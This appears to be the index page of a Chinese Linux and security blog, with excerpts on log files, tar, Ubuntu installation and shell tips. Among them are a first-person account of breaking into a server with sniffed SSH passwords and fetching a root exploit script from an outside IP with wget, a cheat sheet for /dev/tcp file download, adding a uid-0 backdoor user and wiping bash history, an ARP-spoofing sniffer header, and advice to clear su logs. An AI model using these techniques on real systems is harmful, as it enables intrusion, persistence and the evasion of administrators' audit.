0x50sec.org

透析Linux日志查入侵
来源:http://hi.baidu.com/xi4o7e

日志对于网络安全来说无疑是非常重要的，它记录了系统每天发生的各种各样的事，你可以通过它来检查错误发生的原因，或者受到攻击后攻击者留下的痕迹。日志主要的功能有审计和监测，同时它也可以实时的监测系统状态，监测入侵者。

日志子系统分类
在Linux系统中，有三个主要的日志子系统：
连接时间日志——由多个程序执行，把纪录写入到/var/log/Wtmp和/var/run/Utmp，Login等程序更新Wtmp和Utmp文件，使系统管理员能够跟踪谁在何时登录到系统。
进程统计——由系统内核执行。当一个进程终止时，为每个进程往进程统计文件（Pacct或Acct）中写一个纪录。进程统计的目的是为系统中的基本服务提供命令使用统计。
错误日志——由Syslogd（8）执行。各种系统守护进程、用户程序和内核通过Syslog（3）向文件/var/log/messages报告值得注意的事件。另外有许多UNIX程序创建日志。像HTTP和FTP这样提供网络服务的服务器也保持详细的日志。
常用的日志文件如下：
Access-log：纪录HTTP/WEB的传输。
Acct/pacct：纪录用户命令。
Aculog：纪录MODEM的活动。
Btmp：纪录失败的纪录。
Lastlog：纪录最近几次成功登录的事件和最后一次不成功的登录。
Messages：从Syslog中记录信息（有的链接到Syslog文件）。
Sudolog：纪录使用Sudo发出的命令。
Sulog：纪录“su”的使用。
Utmp：纪录当前登录的每个用户。
Wtmp：一个用户每次登录进入和退出时间的永久纪录。
Xferlog：纪录FTP会话。
阅读全文…

by:vitter
blog:blog.securitycn.net
今天发现一台肉鸡上某人的ssh连到另外一台服务器上，记录下了密码。
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11′s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m

[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

是rhel5.0没升级过内核，vmsplice的local root应该可以的，不过测试了下，机器挂了，换udev的好了。

[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
–13:21:09– http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80… .. 200 OK
366 (3.3K) [application/x-sh]
Saving to: `u.sh’
阅读全文…

PC硬件使用的增加是近年来高端嵌入式系统的一个最重要的发展。由于这个趋势，嵌入式系统的硬件成本大大地下降了，然而应用于嵌入式PC平台的软件系统却没有太多的选择。

目前嵌入式操作系统主要有Palm OS，WindowsCE，EPOC，LinuxCE，QNX．ECOS，LYNX等，但这些系统一般都价格昂贵、不具有良好的可移植性。由于linux具有适应于多种CPU和多种硬件平台、性能稳定、裁剪性能好，开发和使用都很容易等特点，越来越多的人倾向于将Linux嵌入到移动计算平台、信息家电、媒体手机及其它产品中去。这同时也对Linux的实时性提出了更高的要求。
我们参加开发的上海数字技术中心的电子警察系统就是这样一个基于PC平台的嵌入式系统。它的主要功能是安装在十字路口上监视闯红灯的汽车，录制这些镜头，并适时通过网络传回总监控中心。该系统原来采用Vxworks作为运作平台，然而由于Vxworks的昂贵，且只能安装一台机器，因此将Linux改制成嵌入式的、具有一定实时性的系统平台。 阅读全文…

作者：cnbird
1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

2.Linux添加uid为0的用户
useradd -o -u 0 cnbird

3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null 阅读全文…

来源：51cto.com

/*============================================================================
Coder:  Paris-ye
Released on: 1/9/2003
Test on: redhat 9.0
Information:
This is a arp spoof sniffer.
W <— workstation
B <— Server or  GateWay
M <— Man in the middle (agent),self IP address
Make:
first you must install “pcap” and “libnet”
gcc -I/usr/local/include -L/usr/local/lib -o sniffer sniffer.c -lpcap -lnet
Usage:
./sniffer -I [Interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port] 阅读全文…

来源：http://huairen.me/archives/221.html

终端下拼音补全中文名称和路径

在 Linux 下打字飞快的朋友，遇到中文目录和文件名立马就慢下来了， 有 2 种选择：

切换成中文输入一两个汉字，然后按 TAB 补全
动用鼠标复制
现在有第三种选择了

用拼音补全命令行中的中文名称和路径

实验目录如下：

biff@lenovo:/domain/WorkSpace$ ls
SVN培训 全球眼 浙江建行 浙江农信
使用: (输完后按 TAB 键自动补全)

cd S <tab> 进入[SVN培训]
cd q <tab> 进入[全球眼]
cd z <tab> 自动补全[浙江]
cd zj <tab><tab> 提示[浙江建行 浙江农信]备选
cd 浙江j <tab> 进入[浙江建行]
cd zjj <tab> 进入[浙江建行]
cd zj1 <tab> 进入[浙江建行]
cd zj2 <tab> 进入[浙江农信]
这第 3 种方法是前两种方法不能比的，自已用了半个月了，超爽！

共享给大家，有意见再改。下载…

阅读全文…

来源:http://www.sky6.cn/read.php/2.htm

Linux Tar命令的用法详解
tar命令
tar 文件是几个文件和（或）目录在一个文件中的集合。这是创建备份和归档的佳径。
tar 使用的选项有：
-c — 创建一个新归档。
-f — 当与 -c 选项一起使用时，创建的 tar 文件使用该选项指定的文件名；当与 -x 选项
一起使用时，则解除该选项指定的归档。

-t — 显示包括在 tar 文件中的文件列表。

-v — 显示文件的归档进度。

-x — 从归档中抽取文件。

-z — 使用 gzip 来压缩 tar 文件。

-j — 使用 bzip2 来压缩 tar 文件。

要创建一个 tar 文件，键入：

tar -cvf filename.tar directory/file

阅读全文…

来源:http://www.sky6.cn/read.php/51.htm
实用Linux命令大全
1 文件管理 # ls ls -a 列出当前目录下的所有文件，包括以.头的隐含文件
文件管理 # ls ls -l或ll 列出当前目录下文件的详细信息
文件管理 # pwd pwd 查看当前所在目录的绝对路经
文件管理 # cd cd .. 回当前目录的上一级目录
文件管理 # cd cd – 回上一次所在的目录
文件管理 # cd cd ~ 或 cd 回当前用户的宿主目录
文件管理 # cd cd ~用户名 回指定用户的宿主目录
2 文件管理 # mkdir mkdir 目录名 创建一个目录
文件管理 # mkdir mkdir –p 递归式去创建一些嵌套目录
文件管理 # rmdir Rmdir 空目录名 删除一个空目录
3 文件管理 # rm rm 文件名 文件名 删除一个文件或多个文件
文件管理 # rm rm -rf 非空目录名 递归删除一个非空目录下的一切，不让提式-f
4 文件管理 # cat cat文件名 一屏查看文件内容

阅读全文…

Ubuntu初学者必备。

Ubuntu,Linux for human beings!!!

Ubuntu 8.04 速成手册             v1.0

感谢所有为开源和 Linux 发展做出贡献的人们
未来的家庭,除了一个窗口,还有一只企鹅
文章欢迎转载,转载请注明出处:
嘉骏苑 http://luckiss.blogcn.com(文章整理&原创 by:嘉骏)
本手册文章未经作者同意,不得用于商业用途
更多资讯请参考 ubuntu 中文官方网站: http://www.ubuntu.org.cn
对 linux 感兴趣的朋友也可以加入以下 Q 群一起交流:
fc 和 ubuntu 学习开发群:37411803
fc 和 ubuntu 学习开发群 2:45895198
fc 和 ubuntu 学习开发群 3:39893821
系统安装篇
首先下载 8.04 的镜像,32 位 cpu 就选 32 位版本,64 位 cpu 请相信我大胆的选择 64 位版本
^_^
国内 LUPAWORLD 的 cd 镜像

http://mirror.lupaworld.com/ubuntu/releases/8.04/

官方的下载点: http://releases.ubuntu.com/releases/8.04
注意这里有 Desktop,Server 的版本选择,一般桌面用户下载 Desktop CD 就可以了
下载完后,先验证一下镜像的 MD5 码是否正确,然后把镜像刻录成光盘进行安装。 把刻录
好的 CD,放进光驱,选择光驱启动,进入安装。
光盘安装 Ubutnu8.04(推荐的安装方法 )
1 备份资料 如果以前没有安装过 Ubuntu 的可以跳过这一步。 如果你没有把 /home 目录
单独挂载出来,建议你把他备份到一个安全的地方,至于其他系统分区、软件分区、都可以
不管,保留软件设置比软件重要。 小贴士:如果你在本机搭建了 Web 服务器,不要忘了备
份 /var/www 目录。
2 准备分区 这是新手问最多的问题,如果你以前使用 Windows ,那么你需要单独给
Ubuntu 划分一个空白分区,可以使用 Windows 自带的分区工具,也可以使用 PQ 分区管
理工具。建立 Linux 分区的操作建议在 Ubuntu 安装过程中进行。
如果您还是对硬盘分区有疑问的可以参考这里
关于最简单可行的分区方法 1. 先在 windows 下,我的电脑上点右键—–管理——磁盘
管理—–删除最后一个分区(先备份再做,也可以进行先删除分区后再调整下分区大小,保
留一个分区未分就行) 2. 安装 desktop 版 ubuntu,安装的时候让它自动分区并钩选最大

的连续空闲空间。
阅读全文…

来源:kiindle’s blog

UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的 痕迹,UNIX系统存放LOG文件,普通位置如下:
/usr/adm – 早期版本的UNIX
/var/adm – 新一点的版本使用这个位置
/var/log – 一些版本的Solaris,linux BSD,Free BSD使用这个位置
/etc – 多数UNIX版本把utmp放在这里，有些也把wtmp放在这里，syslog.conf在这里
下面的一些文件根据你所在的目录不同而不同：
acct 或 pacct — 记录每个用户使用的命令记录
access_log — 主要当服务器运行NCSA HTTPD时, 记录什么站点连接过你的服务器
aculog — 保存着你拨出去的MODEMS记录
lastlog — 记录了用户最近的LOGIN记录和每个用户的最初目的地，有时是最后不
成功LOGIN的记录,当一个用户登陆到unix系统，注册程式在lastlog文件中查找该用户的uid，如果该程式找到了
该用户的uid，unix就会显示最后一次登陆的时间和tty（终端号）
loginlog — 记录一些不正常的LOGIN记录
messages — 记录输出到系统控制台的记录，另外的信息由syslog来生成
security — 记录一些使用UUCP系统企图进入限制范围的事例

sulog — 记录使用su命令的记录．他通常在/var/adm/sulog．如果你在机器上使用了su命令，别忘了清除哦．
阅读全文…